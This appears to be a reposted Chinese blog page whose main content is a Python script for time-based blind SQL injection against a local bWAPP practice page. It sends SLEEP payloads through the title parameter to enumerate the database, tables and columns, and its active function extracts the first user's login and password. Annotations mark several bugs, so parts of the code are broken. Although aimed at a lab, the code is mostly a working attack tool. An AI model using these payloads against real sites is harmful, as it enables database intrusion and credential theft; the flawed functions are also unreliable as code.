
sql注入----sql injection script

2022-07-11 18:02:56  阅读:147  来源: 互联网



import requests
import time
import yaml

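# Headers sent with every probe. The session cookie and ``security_level=0``
# are hard-coded for the local bWAPP lab instance.
HEADER = {
    "cookie": "PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
# Target endpoint; each function below appends its own query string.
BASE_URL = 'http://localhost/bWAPP/app/sqli_15.php'
# Config file read once at import time (absolute local path).
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# ``yaml.safe_load`` replaces the original ``yaml.load(file.read())``:
# the full loader can instantiate arbitrary Python objects from tags in
# the file, and PyYAML >= 6 raises TypeError when ``load`` is called
# without an explicit Loader. safe_load accepts the file object directly.
with open(config_path, "r") as file:
    data = yaml.safe_load(file)
# Only this one fragment is taken from the config; it is referenced by the
# first ``get_table_count`` definition further down.
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)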

def get_database_name_length(a,b)->int:
    """Generic timing probe: request ``a + b.format(i)`` for i in 1..99.

    Args:
        a: base URL; a ``?`` is appended if it does not already end with one
           (an empty ``a`` raises IndexError on ``a[-1]``).
        b: query-string template with one ``{}`` placeholder for ``i``.

    Returns:
        The first ``i`` whose request took longer than 2 seconds, or 0 if
        none of the 99 requests did. Each probe URL is printed before it
        is sent.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    if a[-1]!="?":
        a=a+"?"
    for i in range(1,100):
        url=a+b.format(i)
        start_time = time.time()
        print(url)
        requests.get(url,headers=HEADER)
        # Wall-clock latency is the only signal: it includes network delay,
        # so a slow response for any reason counts as a hit.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count

#获得盲注的数据库长度
def get_database_name()->int:
    """Probe 1..99 for the length of the current database name.

    Despite the name, this returns a length, not the name itself: the first
    ``i`` whose request exceeds 2 seconds, or 0 if none does. Issues up to
    99 sequential GETs to ``BASE_URL`` that differ only in one integer
    inside ``title``.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        # Latency threshold matches the SLEEP(2) in the payload.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count
#获得盲注的数据库名称
def get_database_table(count):
    """Recover the database name one character at a time (``count`` chars).

    For each position 1..count, tries every printable ASCII code 33..126 and
    takes the first whose request exceeds 2 seconds. Prints the result;
    returns None.

    NOTE(review): ``"...".chr(m)`` on the print line is not a str method,
    so the first timing hit raises AttributeError before ``break`` — the
    function cannot run to completion as written.
    """
    #mmp=get_database_name()
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                print("盲注数据库名长度为{}".chr(m))
                break
    print("打印数据库名称"+x)

#获得数据库此库下面表数量
def get_table_count()->int:
    """Probe values 1..99 against the config-supplied expression ``student1``.

    Returns the first value whose request exceeds 2 seconds.

    NOTE(review): ``count`` is assigned only inside the ``if``; when no
    request is slow, ``return count`` raises UnboundLocalError. The print
    concatenates with ``+`` rather than ``.format``, so the literal ``{}``
    is emitted. This definition is shadowed at import time by the second
    ``get_table_count`` later in the file.
    """
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
        start_time=time.time()
        requests.get(url,headers=HEADER)
        if time.time()-start_time>2:
            count =i
            print("打印当前数据库下面表数量{}"+str(count))
            break
    return count

#获得每个数据库表名的长度
def get_table_counts(counts)->int:
    """For table indexes 0..counts, find each table-name length (1..99).

    On a hit, calls ``get_database_tabless(i, m)`` for that index/length and
    moves on to the next index. Returns ``m`` as left by the last inner
    loop, which is only meaningful for the final index. Note
    ``range(counts + 1)`` visits counts+1 indexes.
    """
    for i in range(counts + 1):
        for m in range(1,100):
            url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
            " and sleep(2) -- &action=search".format(i,m)
            start_time=time.time()
            requests.get(url,headers=HEADER)
            if time.time()-start_time>2:
                print("打印当前表名长度{}".format(m))
                get_database_tabless(i, m)
                break
    return m

#获得所有数据库的表名
def get_database_tabless(index,count):
    """Recover the name of table ``index`` character by character.

    Args:
        index: zero-based table offset.
        count: number of characters to recover (positions 1..count).

    Prints the accumulated name, then resets ``x`` before returning, so the
    return value is always ``""`` — callers only see the result on stdout.
    The print concatenates with ``+``, so its ``{}`` is emitted literally.
    """
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
            "ascii(substr((select table_name from information_schema.tables " \
            "where table_schema=database() limit {},1),{},1))={}" \
            " and sleep(2) -- &action=search".format(index,i,m)
            # The subquery selects the table name at offset ``index``;
            # substr(str, i, 1) isolates character ``i`` for comparison.
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                break
    print("打印数据库名称{}" + x)
    x=""
    return x

#根据打印结果,想需要users表里面的列总数
def get_table_count()->int:
    """Probe 1..99 for the number of columns in the ``users`` table.

    Returns the first value whose request exceeds 2 seconds, or 0 if none
    does. Redefines the earlier ``get_table_count``; this is the binding in
    effect at runtime.
    """
    count=0
    # select count(column_name) from information_schema.columns
    # where table_name='users' -- counts the fields of the users table
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
        "AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:

            print("盲注数据库中users表列数量为:{}".format(i))
            count = i
            return count
    return count

#获得users表中列名的长度
def get_table_nameNumber(count):
    """For column indexes 0..count, find each column-name length (0..99).

    On a hit, calls ``get_column_name_of(i, j)`` before printing the length
    and moving to the next index. Returns None.
    """
    for i in range(count+1):
        for j in range(100):
            url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
            "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                get_column_name_of(i,j)
                print("user表,字段长度为{}".format(j))
                break

#获取每个字段的名称
def get_column_name_of(index,count):
    """Print one character per position for column ``index``.

    For each of count+1 positions, prints ``chr(j)`` for the first j in
    33..126 whose request exceeds 2 seconds. Nothing is accumulated and
    nothing is returned.
    """
    for i in range(count+1):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
            "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
            "AND SLEEP(2) -- &action=search".format(index,i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print(chr(j))
                break

#获得所需字段的用户名跟密码
def get_username_password():
    """Recover ``login,password`` of the first ``users`` row, char by char.

    For positions 0..99, sweeps ASCII 33..126 and keeps the first code whose
    request exceeds 2 seconds. Prints the accumulated string, then clears
    it; returns None. Up to 100*94 sequential GETs per call, each differing
    only in two integers inside ``title`` and carrying ``SLEEP(2)`` — the
    repetitive, latency-bound traffic shape that rate-limit and WAF rules
    key on.
    """
    values=""
    for i in range(100):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
            "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                values=values+chr(j)
                break
    print(values)
    values=""

备注:盲注的时候一般使用and

if __name__=='__main__':
    # Earlier enumeration stages are left commented out; only the final
    # extraction step runs.
    #get_table_counts(get_table_count())
    #get_database_table(get_database_name())
    #get_table_counts(get_table_count())
    #get_table_count()
    #get_table_count()  # prints the total column count of the users table
    get_username_password()  # prints the requested output

userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入

 

 





来源: https://www.cnblogs.com/wendy-0901/p/16467320.html
